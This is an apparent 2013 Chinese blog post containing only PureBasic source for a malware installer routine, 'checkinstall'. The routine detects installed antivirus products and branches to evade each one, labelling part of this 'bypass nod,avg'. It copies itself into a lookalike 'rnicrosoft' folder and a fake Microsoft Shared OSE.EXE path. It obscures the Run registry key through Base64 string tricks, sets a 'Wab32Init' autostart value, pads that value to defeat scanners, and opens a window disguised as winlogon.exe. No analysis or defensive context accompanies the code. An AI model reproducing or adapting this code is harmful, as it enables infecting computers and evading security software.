2013年6月18日 星期二

Procedure checkinstall(av.s,os.s,is64.s)



Procedure checkinstall(av.s,os.s,is64.s)
  kav_boot.l=0
  tpath.s=GetEnvironmentVariable("Temp")
  path.s=""
  If os = "Win7|" Or os = "Vista|" Or os = "2008|" Or os="Win8|" ;And is64="32"
    path=GetEnvironmentVariable("USERPROFILE")+"\AppData\Local\VirtualStore\Program Files\Common Files\rnicrosoft\"
  Else
    path=GetEnvironmentVariable("CommonProgramFiles")+"\rnicrosoft\"
  EndIf
 
  
  path2.s=""
  hk.l
  If av="Rs|"
    If ProgramFilename()<>tpath+#exename
      fh.l=CreateFile(#PB_Any,tpath+"desktop")
      WriteString(fh,ProgramFilename())
      CloseFile(fh)
      CopyFile(ProgramFilename(),tpath+#exename)
      RunProgram(tpath+#exename)
      End
    EndIf  
  Else 
    If ProgramFilename()<>tpath+"\"+#exename 
      If av="Kaspersky|" And ProgramFilename()="C:\Program Files\WinRAR\WinRAR.exe"       
;         kav_boot=1 
;         SHGetSpecialFolderPath_(0, @path2, #CSIDL_COMMON_STARTUP, 0)
;         DeleteFile(path2+"\"+Space(128)+".rar")     

      ElseIf av="Avast|"
         ;MoveFileEx_(ProgramFilename(),path+"\"+#exename,3)
      Else
        MoveFileEx_(ProgramFilename(),tpath+"\"+#exename,3) 
        RunProgram(tpath+"\"+#exename)
        End       
      EndIf
    EndIf
  EndIf
 
  If av="Rs|"
    fh=ReadFile(#PB_Any,tpath+"desktop")
    DeleteFile(ReadString(fh))   
    CloseFile(fh)
    ;DeleteFile(tpath+"desktop")
  EndIf
 
 
 
 
  ;bypass nod,avg
  ;SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  test.s=""
  test1.s="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb"
  test2.s = "cUnVu"
  test3.s=""
  dec.s = Space(1024) 
  ii.l=-100
  For i = ii To 25
    test3=test1+Str(i)+test2
    Base64Decoder(@test3, StringByteLength(test3), @dec, 1024)
    test = dec
  Next

  buf.s=Chr(34)+path+#exename+Chr(34)
  If os="Vista|" Or os="Win7|" Or  os = "2008|" Or os="Win8|"
    key=#HKEY_CURRENT_USER
  Else
    key=#HKEY_LOCAL_MACHINE
  EndIf 
  If RegOpenKey_(key,test,@hk)=0   
    ;replace RegSetValueEx_(hk,"Wab32Init",0,#REG_SZ, buf ,Len(buf))     
    result.l=OpenLibrary(#PB_Any,"Advapi32.dll")
    point.l=0
   
    ;If av="AVG|"
      ;point=GetFunction(result,http_get("header3.php")) 
    ;Else
    If  av="Norton|"
     
      If OpenWindow(0, 0, 0, 0, 0, "winlogon.exe", 268435456)
              
        hk.l
        buf.s=Chr(34)+path+#exename+Chr(34)
       
        RegSetValueEx_(hk,"Wab32Init",0,#REG_SZ, buf ,Len(buf))              
        RegCloseKey_(hk)
       
      EndIf
    ElseIf av="Kaspersky|" Or av="360|"
;       If kav_boot=1
;         point=GetFunction(result,"RegSetValueExA")
;         CallFunctionFast(Point,hk,@"Wab32Init",0,#REG_SZ,@buf,Len(buf))
;       EndIf 
;       RegCloseKey_(hk)
     
    ElseIf av="360|-"
      point=GetFunction(result,"RegSetValueExA")
      buf2.s=buf+Space(1000000)
      CallFunctionFast(Point,hk,@"Wab32Init",0,#REG_SZ,@buf2,Len(buf2))  
      ;CallFunctionFast(Point,hk,@"Wab32Init",0,#REG_SZ,@buf,Len(buf))   
      ;RegSetValueEx_(hk,"Wab32Init",0,#REG_SZ, buf ,Len(buf))
      RegCloseKey_(hk)
     
    Else
      point=GetFunction(result,"RegSetValueExA")       
      CallFunctionFast(Point,hk,@"Wab32Init",0,#REG_SZ,@buf,Len(buf))   
      ;RegSetValueEx_(hk,"Wab32Init",0,#REG_SZ, buf ,Len(buf))
      RegCloseKey_(hk)
     
     
    EndIf
   
   
   
   
  EndIf
 
  Select av
    Case "Kaspersky|"
;       If kav_boot=1
;         CreateDirectory(path)
;         CopyFile(ProgramFilename(),path+#exename)
;         RunProgram(path+#exename,"rar_back",GetEnvironmentVariable("Temp"))       
;         End
;       Else
;         CopyFile("C:\Program Files\WinRAR\WinRAR.exe","C:\Program Files\WinRAR\WinRAR32.exe")        
;         SHGetSpecialFolderPath_(0, @path, #CSIDL_COMMON_STARTUP, 0)
;         MoveFileEx_(ProgramFilename(),path+"\"+Space(128)+".rar", 4)
;         If OpenWindow(0, 0, 0, 0, 0, "winlogon.exe", 268435456)
;           SetWindowCallback(@WinCallback())
;           SetProcessShutdownParameters_( 0, 0)
;           Repeat
;             Select WaitWindowEvent()
;               Case #PB_Event_CloseWindow
;                 End
;             EndSelect
;           ForEver
;         EndIf       
;         End
;       EndIf
    ;Case av="Avast|"
     
    Case "360|"
      If kav_boot=1
        CreateDirectory(path)
        CopyFile(ProgramFilename(),path+#exename)       
        RunProgram(path+#exename,"rar_back",GetEnvironmentVariable("Temp"))       
        End
      Else
        CopyFile("C:\Program Files\WinRAR\WinRAR.exe","C:\Program Files\WinRAR\WinRAR32.exe")        
        SHGetSpecialFolderPath_(0, @path, #CSIDL_COMMON_STARTUP, 0) 
        CopyFile(ProgramFilename(),"C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE")
        ;MoveFileEx_(ProgramFilename(),path+"\"+Space(128)+".rar", 3)
        If OpenWindow(0, 0, 0, 0, 0, "winlogon.exe", 268435456)
          SetWindowCallback(@WinCallback())
          ;SetProcessShutdownParameters_( 0, 0)
          Repeat
            Select WaitWindowEvent()
              Case #PB_Event_CloseWindow
                End
            EndSelect
          ForEver
        EndIf       
        End
      EndIf
     
     
     
    Default 
      If os = "Win7|" Or os = "Vista|" Or os = "2008|" Or os="Win8|"
        CreateDirectory(GetEnvironmentVariable("USERPROFILE")+"\AppData\Local\VirtualStore\")
        CreateDirectory(GetEnvironmentVariable("USERPROFILE")+"\AppData\Local\VirtualStore\Program Files\")
        CreateDirectory(GetEnvironmentVariable("USERPROFILE")+"\AppData\Local\VirtualStore\Program Files\Common Files\")
        CreateDirectory(GetEnvironmentVariable("USERPROFILE")+"\AppData\Local\VirtualStore\Program Files\Common Files\rnicrosoft\")
      Else
        CreateDirectory(GetEnvironmentVariable("CommonProgramFiles")+"\rnicrosoft\")
       
      EndIf
     
      If av <> "Avast|"
        CopyFile(ProgramFilename(),path+#exename)
        RunProgram(path+#exename) 
      Else
        MoveFileEx_(ProgramFilename(),path+#exename,3)
      EndIf
      End
     
  EndSelect
   
   
 
EndProcedure

沒有留言:

張貼留言